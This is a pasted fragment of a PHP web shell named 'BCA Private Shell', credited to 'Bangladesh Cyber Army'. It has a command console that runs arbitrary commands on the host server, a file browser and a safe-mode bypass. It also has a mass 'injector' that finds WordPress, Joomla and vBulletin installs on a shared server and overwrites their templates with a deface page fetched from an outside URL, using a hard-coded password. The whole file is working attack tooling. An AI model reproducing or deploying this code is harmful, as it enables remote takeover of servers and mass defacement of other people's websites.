- <div class="tblbx'.$q.'" style="width:160px;"><a class="conf" href="'.$dan['link'].'">'.$dan['cms'].'</a></div>
- <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$k.'">Idle...</div>
- </div>';
- file_put_contents("rootinject.tmp",$nant,FILE_APPEND);
- $nan .= $nant;
- }
- }
- $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$k.'">';
- echo $nan.$cnt;
- }
- die();
- }
- elseif($_POST['ac'] == "inject"){
- error_reporting(0);
- $cms = strtolower($_POST['cms']);
- $cnf = $_POST['conf'];
- if(file_exists(md5($_POST['deface_page']))){
- $html = file_get_contents(md5($_POST['deface_page']));
- }else{
- $html = file_get_contents($_POST['deface_page']);
- file_put_contents(md5($_POST['deface_page']),$html);
- file_put_contents("bca.html",$html);
- }
- if(!is_dir("cookie")){
- @mkdir("cookie",0777);
- }
- switch($cms){
- case "wordpress":
- doXploitWP($cnf,$html,"uradhura123");
- break;
- case "joomla":
- doXploitJM($cnf,$html,"uradhura123");
- break;
- case "vbulletin":
- doXploitVB($cnf,$html);
- break;
- case "phpbb":
- break;
- case "ipb":
- break;
- case "mybb":
- break;
- case "oscommerce":
- break;
- case "smf":
- break;
- case "drupal":
- break;
- case "seditio":
- break;
- case "e107":
- break;
- }
- throwErr("Not Added");
- }
- elseif($_POST['ac'] == "ssh"){
- $ssh = exme($_POST['command']);
- die(nl2br($ssh));
- }
- elseif($_POST['ac'] == "phpinfo"){
- $php = phpinfo();
- die($php);
- }
- ;echo '<html>
- <title>BCA Private Shell</title>
- <head>
- <script src="http://code.jquery.com/jquery-latest.min.js"></script>
- </head>
- <body bgcolor="black" background="http://www.madtomatoe.com/wp-content/uploads/2010/11/matrix-animated-image.gif">
- <style>
- body{
- font-family: "courier new";
- background-color: black;
- font-size:80%;
- color: #28FE14;
- background-image: url("data:image/gif;base64,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");
- }
- #sysinfo{
- border: 1px solid #28FE14;
- position:fixed;
- padding:2px;
- top:1px;
- left:1px;
- background-color: black;
- font-size:12px;
- }
- #phpinfo{
- border: 1px solid #28FE14;
- position:fixed;
- padding:2px;
- top:1px;
- right:1px;
- background-color: black;
- font-size:12px;
- }
- #status{
- border: 1px solid #28FE14;
- position:fixed;
- padding:2px;
- bottom:1px;
- right:1px;
- background-color: black;
- font-size:12px;
- }
- #infobox{
- z-index:1;
- border: 1px solid white;
- margin-left:auto;
- margin-right:auto;
- margin-top:50px;
- width:600px;
- background-color: black;
- font-size:12px;
- }
- .infotitle{
- padding:4px;
- background-color: white;
- color: black;
- font-family: Thaoma;
- font-size:14px;
- }
- .infotxt{
- padding:5px;
- }
- .sidebar{
- position:fixed;
- left:1px;
- top:30%;
- }
- .stitle{
- float:left;
- cursor:pointer;
- padding:7px;
- color:black;
- background-color: white;
- }
- .stitle:hover{
- color:red;
- }
- .smnu{
- display:none;
- background-color: black;
- padding:5px;
- border: 1px solid white;
- float:left;
- }
- a{
- color: #df5;
- text-decoration: none;
- }
- a:hover{
- color:white;
- }
- .copyright{
- position:fixed;
- bottom:1px;
- left:1px;
- padding:2px;
- }
- .logo{
- margin:auto;
- width:600px;
- height:600px;
- background-image: url("http://4.bp.blogspot.com/-DEFzMZtxffI/Tz11pJscP9I/AAAAAAAAAIQ/4UKKPprIg5U/s1600/jh3gj7.gif");
- }
- .filetable{
- margin-top:2px;
- width:740px;
- }
- .tblcnt{
- text-align: center;
- margin-left:2px;
- color:black;
- background-color: white;
- padding:3px;
- float:left;
- border: 1px solid white;
- }
- .tblbx1{
- height:12px;
- text-align: center;
- margin-left:2px;
- color:white;
- background-color: #333333;
- padding:3px;
- float:left;
- border: 1px solid #333333;
- }
- .tblbx2{
- height:12px;
- text-align: center;
- margin-left:2px;
- color:white;
- background-color: #444444;
- padding:3px;
- float:left;
- border: 1px solid #444444;
- }
- .tbl{
- margin-top:100px;
- padding-top:2px;
- padding-bottom: 2px;
- margin:auto;
- width:742px;
- border: 1px solid white;
- }
- .rbox{
- float:left;
- border: 1px solid #28FE14;
- padding:10px;
- }
- .smit{
- background-color: black;
- color: #28FE14;
- }
- .sshbox{
- display:none;
- padding-left:7px;
- width:600px;
- height:400px;
- margin: auto;
- margin-top:80px;
- -webkit-border-radius: 10px;
- -moz-border-radius: 10px;
- border-radius: 10px;
- border:3px solid #FFF5F5;
- background-color:#080500;
- overflow:auto;
- }
- #sshcmd{
- width:450px;
- background-color: #080500;
- color:#28FE14;
- border:none;
- }
- </style>
- <body>
- <div class="logo" id="logo"></div>
- <div id="sysinfo"><strong>OS:</strong> ';echo php_uname("s")." - ".php_uname("r")." / ".php_uname("m");;echo '</div>
- <div id="phpinfo"> ';
- $srvsoft = explode(" ",$_SERVER['SERVER_SOFTWARE']);
- echo $srvsoft[0];
- echo " PHP ".phpversion();
- if( ini_get('safe_mode') ){
- echo " <font color='red'>Safe Mode On</font>";
- }else{
- echo " <font color='blue'>Safe Mode Off</font>";
- }
- ;echo '</div>
- <div id="tbl" class="tbl" style="display:none;">
- <div class="filetable">
- <div class="tblcnt" style="width:220px;">Name</div>
- <div class="tblcnt" style="width:80px;">Size</div>
- <div class="tblcnt" style="width:100px;">Modify</div>
- <div class="tblcnt" style="width:100px;">Owner</div>
- <div class="tblcnt" style="width:100px;">Permission</div>
- <div class="tblcnt" style="width:80px;">Action</div>
- </div>
- <div id="filest"></div>
- <div style="clear:both;"></div>
- </div>
- <div id="inject" class="tbl" style="display:none;">
- <div class="filetable">
- <div class="tblcnt" style="width:200px; cursor:pointer;" onClick="doSlct();">User</div>
- <div class="tblcnt" style="width:220px;">Sitename</div>
- <div class="tblcnt" style="width:160px;">CMS</div>
- <div class="tblcnt" style="width:120px;">Status</div>
- </div>
- <div id="injtbl"></div>
- <div style="clear:both;"></div>
- </div>
- <div id="infobox" style="display:none;"><div class="infotitle"><a href="" onclick="$(\'#infobox\').hide();return false;" style="color:black;">[-]</a> <span id="infotitle">Information</span></div><div class="infotxt" id="infotxt"></div></div>
- <script>
- var sidebar = false;
- var sidebar2 = false;
- function sidebarz(){
- $(\'#logo\').hide();
- if(sidebar){
- $(\'#smnu\').hide();
- sidebar = false;
- }else{
- $(\'#smnu\').show();
- sidebar = true;
- }
- }
- function sidebarz2(){
- if(sidebar2){
- $(\'#smnu2\').hide();
- sidebar2 = false;
- }else{
- $(\'#smnu2\').show();
- sidebar2 = true;
- }
- }
- function filebrs(val){
- hideAll();
- $(\'#status\').html(\'Status: Requesting...\');
- $.post("", { ac: "browse", path: val},
- function(data) {
- $(\'#tbl\').show();
- $(\'#status\').html(\'Status: Completed (:\');
- $(\'#filest\').html(data);
- });
- }
- function doUpdt(val){
- var refreshId = setInterval(function() {
- $("#injtbl").load(\'rootinject.tmp\');
- }, 5000);
- $.ajaxSetup({ cache: false });
- hideAll();
- $(\'#inject\').show();
- $(\'#status\').html(\'Status: Requesting...\');
- $.post("", { ac: val},
- function(data) {
- refreshId = "";
- $(\'#sidebar2\').show();
- $(\'#status\').html(\'Status: Completed (:\');
- $(\'#injtbl\').html(data);
- });
- }
- function hideAll(){
- k1 = 0;
- k2 = 0;
- $(\'#sidebar2\').hide();
- $(\'#tbl\').hide();
- $(\'#inject\').hide();
- $(\'#infobox\').hide();
- $(\'#sshbox\').hide();
- }
- function doReq(val){
- hideAll();
- $(\'#inject\').show();
- $(\'#status\').html(\'Status: Requesting...\');
- $.post("", { ac: val},
- function(data) {
- $(\'#sidebar2\').show();
- $(\'#status\').html(\'Status: Completed (:\');
- $(\'#injtbl\').html(data);
- });
- }
- function doReq2(val){
- hideAll();
- $(\'#status\').html(\'Status: Requesting...\');
- $.post("", { ac: val},
- function(data) {
- $(\'#infobox\').show();
- $(\'#status\').html(\'Status: Completed (:\');
- $(\'#infotxt\').html(data);
- });
- }
- //Js Multi thread post request by Elo (:
- var k1 = 1; var k2 = 0; var req_limit = 9;
- function doInject(){
- var i = 0; var j = 0;
- $(\'.conf\').each(function(){
- i += 1;
- var id = $(this).attr(\'title\');
- if(id > k1){
- j += 1; k1 += 1;
- var link = $(this).attr(\'href\');
- var domain = $(\'#inj_dom\' + id).html();
- var cms = $(this).html();
- doPost2(link,cms,id,domain);
- }
- if(j > req_limit){return false;}
- });
- }
- function doPost2(link,cmz,id,dmn){
- if($(\'#injchk\'+id).is(\':checked\')){
- $(\'#inj_status\' + id).html(\'Injecting...\');
- $.ajax({
- url: "",
- type: "POST",
- timeout: 60000,
- data: {ac: "inject", conf: link, domain: dmn, cms: cmz, ignore_def: $(\'#ignore_def:checked\').val(), n404_php: $(\'#404_php:checked\').val(), nindex_php: $(\'#index_php:checked\').val(), nhome_php: $(\'#home_php:checked\').val(), narchive_php: $(\'#archive_php:checked\').val(), ncomment_php: $(\'#comment_php:checked\').val(), com_install: $(\'#use_com:checked\').val(), deface_page: $(\'#deface_page\').val()},
- dataType: "text"
- }).done(function(msg) {
- k2 += 1;
- $(\'#inj_status\' + id).html(\'Parse Error\');
- $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
- var res_data = JSON.parse(msg);
- if(res_data.status == "success"){
- $(\'#inj_domain\' + id).html(\'<a class="injwork" href="\' + res_data.site + \'">\' + res_data.site + \'</a>\');
- $(\'#inj_status\' + id).css({"background-color" : "green", "color" : "white"});
- $(\'#inj_status\' + id).html(\'Success\');
- $(\'#injst\' + id).removeClass("conf");
- }
- else{
- if(res_data.status == "error"){
- $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
- $(\'#inj_status\' + id).html(res_data.msg);
- $(\'#inj_status\' + id).addClass("injerror");
- $(\'#injst\' + id).removeClass("conf");
- }else{
- $(\'#inj_status\' + id).addClass("injerror");
- $(\'#inj_status\' + id).html(\'Unknown\');
- $(\'#injst\' + id).removeClass("conf");
- }
- }
- updateInjSts(k2);
- if(k1 == k2){doInject();}
- }).fail(function(jqXHR, textStatus) {
- k2 += 1;
- $(\'#inj_status\' + id).css({"background-color" : "black", "color" : "white"});
- $(\'#inj_status\' + id).html(\'Timeout\');
- updateInjSts(k2);
- if(k1 == k2){doInject();}
- });
- }else{
- k2 += 1;
- updateInjSts(k2);
- if(k1 == k2){doInject();}
- }
- }
- //Js Multi thread post request by Elo (:
- function updateInjSts(k){
- var tc = $(\'#sitecount\').val();
- if(tc > k){
- $(\'#status\').html("Status: " + k + "/" + tc + " Injected");
- }else{
- $(\'#status\').html("Status: Injection Complete (:");
- }
- }
- function rmvErr(){
- $(\'.injerror\').each(function(){
- var nano = $(this).parent();
- $(nano).remove();
- });
- }
- function rmvSlct(){
- $(\'.conf\').each(function(){
- var id = $(this).attr(\'title\');
- if($(\'#injchk\'+id).is(\':checked\')){
- $(\'#inj\' + id).remove();
- }
- });
- }
- function retryTimeout(){
- k1 = 1; k2 = 0;
- doInject();
- }
- function doSlct(){
- $(\'.conf\').each(function(){
- var id = $(this).attr(\'title\');
- doToggle(id);
- });
- }
- function doToggle(dd){
- if($(\'#injchk\'+dd).is(\':checked\')){
- $(\'#injc\'+dd).css(\'background-color\',\'red\');
- $(\'#injchk\'+dd).attr(\'checked\',false);
- }else{
- $(\'#injc\'+dd).css(\'background-color\',\'#76BBEB\');
- $(\'#injchk\'+dd).attr(\'checked\',true);
- }
- }
- function doSSH(){
- $(\'#status\').html("Status: Requesting...");
- var cmd = $(\'#sshcmd\').val();
- $(\'#sshcmd\').val("");
- $.post("", { ac: "ssh",command: cmd},
- function(data) {
- $(\'#sshoutput\').append("[root@bca~]# <br />"+data+"<br />");
- $(\'#status\').html("Status: Done.");
- });
- }
- </script>
- <div class="sshbox" id="sshbox">
- <br />
- <div id="sshoutput"></div>
- [root@bca~]# <input onkeydown="if (event.keyCode == 13) doSSH();" type="text" id="sshcmd">
- </div>
- <div id="sidebar" class="sidebar">
- <div class="smnu" id="smnu" class="smnu">
- » <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'Security Information\');doReq2(\'secinfo\');return false;">Security Vulnerability</a></br>
- » <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'System Information\');doReq2(\'sysinfo\');return false;">System Information</a></br>
- » <a href="" onClick="$(\'#infotitle\').html(\'PHP Info\');doReq2(\'phpinfo\');return false;">PHP Info</a></br>
- » <a href="" onClick="filebrs(\'\'); return false;">File Browser</a></br>
- » <a href="" onClick="$(\'#infotitle\').html(\'Scanned Domains\');doReq2(\'chknamed\');return false;">Get All Domains</a></br>
- » <a href="" onClick="doReq(\'chkph\');return false;">CMS Detector [Simple]</a></br>
- » <a href="" onClick="$(\'#inject\').show();doUpdt(\'chkph2\');return false;">CMS Detector [root]</a></br>
- » <a href="" onClick="doReq2(\'safebypass\');return false;">Bypass PHP Safe_Mode</a></br>
- » <a href="">Network Tools</a></br>
- » <a href="">SQL Manager(Coming Soon)</a></br>
- » <a href="" onClick="hideAll(); $(\'#sshbox\').show(); return false;">Command Console</a></br>
- » <a href="?ac=killme">Kill Me</a></br>
- </div>
- <div class="stitle" onClick="sidebarz();">O</br>P</br>T</br>I</br>O</br>N</br>S</div>
- </div>
- <div id="sidebar2" class="sidebar" style="display:none;right:1px;left:auto;">
- <div class="smnu" style="float:right;" id="smnu2" class="smnu">
- <div id="injmain">
- » <a href="" onClick="doInject(); return false;">Start Injecting</a></br>
- » <a href="" onClick="">Export</a></br>
- » <a href="" onClick="rmvErr(); return false;">Remove Error</a></br>
- » <a href="" onClick="rmvSlct(); return false;">Remove Selected</a></br>
- » <a href="" onClick="retryTimeout(); return false;">Retry timeout</a></br>
- » <a href="" onClick="alert(\'Do It Manually :p\'); return false;">Submit to Zone-H</a></br>
- » <a href="" onClick="$(\'#injmain\').hide(); $(\'#inj2nd\').show(); return false;">Settings</a></br>
- </div>
- <div id="inj2nd" style="display:none;">
- <div class="rbox">
- <div style="clear:both;"></div>
- <center><u>WordPress</u></center><br>
- <input type="checkbox" name="404_php" id="404_php" checked>404.php<br />
- <input type="checkbox" name="archive_php" id="archive_php" checked>archive.php<br />
- <input type="checkbox" name="index_php" id="index_php" checked>index.php<br />
- <input type="checkbox" name="home_php" id="home_php" checked>home.php<br />
- <input type="checkbox" name="comment_php" id="comment_php" checked>comment.php<br /><br /><br />
- </div>
- <div class="rbox">
- <center><u>Joomla</u></center><br>
- <input type="checkbox" name="use_com" id="use_com" checked>Use Com Installer<br />
- <input type="checkbox" id="ignore_def">Ignore Default Templete<br />
- </div>
- <div class="rbox">
- <center><u>Default</u></center><br>
- Req/s: <input type="text" class="smit" value="10" onChange="req_limit = $(this).val();"><br />
- Deface Page Link: <input type="text" class="smit" id="deface_page" value="http://naramamandiri.com/index.html"><br /><br />
- </div>
- <div style="clear:both;"></div><br />
- <a href="" onClick="$(\'#injmain\').show(); $(\'#inj2nd\').hide(); return false;">Go Back</a>
- </div>
- </div>
- <div class="stitle" style="float:right;" onClick="sidebarz2();">I</br>N</br>J</br>E</br>C</br>T</br>O</br>R</div>
- </div>
- <div style="clear:both;"></div>
- <div id="status">Status: Idle...</div>
- <div class="copyright">Copyright © <a href=""><font color="red">Bangladesh Cyber Army</font></a></div>
- </body>
- </html>';
- ?>
Add Comment
Please, Sign In to add comment